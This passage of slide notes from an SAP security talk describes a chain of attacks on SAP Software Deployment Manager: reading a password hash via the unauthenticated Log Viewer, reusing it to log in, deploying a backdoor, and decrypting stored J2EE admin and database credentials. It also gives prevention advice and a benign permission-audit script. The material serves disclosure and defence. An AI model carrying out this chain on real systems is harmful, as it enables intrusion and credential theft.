  • 28. SDM authentication abuse: …\SDM\program\config\sdmrepository.sdc
  • 29. SDM authentication abuse: SMDAuthenticatorImpl.class
  • 30. Attack on SAP SDM
    - Read sdmrepository.sdc -> Get password hash -> Use hash as password to authenticate on SDM server -> Deploy backdoor on SAP server -> PROFIT!
  • 31. File read
    - OS command execution through CTC (Notes 1467771, 1445998)
    - XML External Entities (Note 1619539)
    - Directory Traversal (Note 1630293)
    - Through MMC file read function (Notes 927637 and 1439348)
    - We have something new for you :)
  • 32. SAP Log Viewer standalone
    - Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket)
    - You can: view log on local server; view log on remote server; register file as log file
    - Read log file without authentication!
  • 33. SAP Log Viewer standalone
    - Attack is pretty easy: Connect to LogViewer standalone server -> Register sdmrepository.sdc file as log file -> Read it
  • 34. SAP Log Viewer standalone (no text on this slide)
  • 35. SAP Log Viewer standalone
    - When we have a password hash, we can use it as password to authenticate on SDM server
  • 36. SDM intrusion: Full info about the SDM repository
  • 37. Bypassing SDM restrictions
    - Observe all server directories
    - Read arbitrary files via Log Viewer
  • 38. SDM undeploying: Undeploy any application
  • 39. SDM backdooring: Deploy any application
  • 40. SDM backdooring: before / after
  • 42. Prevention
    - Install Notes 1724516, 1685106
    - Enable the security features of SDM
    - SDM server and SDM client need to be updated
    - https://websmp205.sap-ag.de/~sapidb/012006153200000493902012E/SDM_EnablingSecurity.pdf
  • 43. SAP SecStore
    - "The Software Deployment Manager (SDM) uses the database connection information, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as software deployment and undeployment." http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
    - Wow! J2EE Engine administrator user and password
    - Where is all this stuff located?
  • 44. SAP SecStore
    - "By default, the J2EE Engine stores secure data in the file usr\sap\<SID>\SYS\global\security\data\SecStore.properties in the file system."
    - "The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm." http://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/2e104202795e33e10000000a155106/content.htm
    - OK. Let's try to read SecStore.properties
  • 45. SAP SecStore
    - We can execute any OS command (we have our backdoor)
    - We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: usr\sap\<SID>\SYS\global\security\data\SecStore.properties
    - It's all that we need
  • 47. Get the password
    - We have an encrypted password
    - We have a key to decrypt it
    - We got the J2EE admin and JDBC login:password!
  • 48. Prevention
    - Restrict read access to files SecStore.properties and SecStore.key
    - http://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/14c93ec2f7df6ae10000000a114084/content.htm
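A check for the recommendation on this slide, added here and not SAP's own tooling: it audits SecStore.properties and SecStore.key on a POSIX host for group or world permission bits and reports each finding. The directory and file contents are constructed placeholders built in a temporary folder; on a real host you would point it at the secure store data directory instead.

```python
"""Read-access audit for the SAP secure store files (added example).

Not SAP's own tooling. Checks the two files named on the slide for group or
world permission bits on a POSIX host; the demo builds a constructed copy of
the directory in a temporary folder instead of touching the real one.
"""
import os
import stat
import tempfile
from typing import List, Tuple

SECSTORE_FILES = ("SecStore.properties", "SecStore.key")


def audit_secstore(data_dir: str) -> List[str]:
    """Return one finding per problem; an empty list means both files are private."""
    findings: List[str] = []
    for name in SECSTORE_FILES:
        path = os.path.join(data_dir, name)
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append(f"{name}: not found in {data_dir}")
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append(f"{name}: readable by group/others (mode {mode:04o})")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{name}: writable by group/others (mode {mode:04o})")
    return findings


def demo() -> Tuple[List[str], List[str]]:
    """Audit a constructed directory before and after tightening permissions."""
    with tempfile.TemporaryDirectory() as data_dir:
        for name in SECSTORE_FILES:
            path = os.path.join(data_dir, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write("# constructed placeholder, not real secure-store content\n")
            os.chmod(path, 0o644)  # a common default: world-readable
        before = audit_secstore(data_dir)
        for name in SECSTORE_FILES:
            os.chmod(os.path.join(data_dir, name), 0o600)  # owner only
        after = audit_secstore(data_dir)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after:", after or "no findings")
```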
  • 51. SAP Guides: it's all in your hands
    - Regular security assessments
    - ABAP code review
    - Monitoring technical security
    - Segregation of Duties
    - Security events monitoring
    - Conclusion: It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure
  • 52. Future work
    - I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations.
    - web: www.erpscan.com
    - e-mail: info@erpscan.com, sales@erpscan.com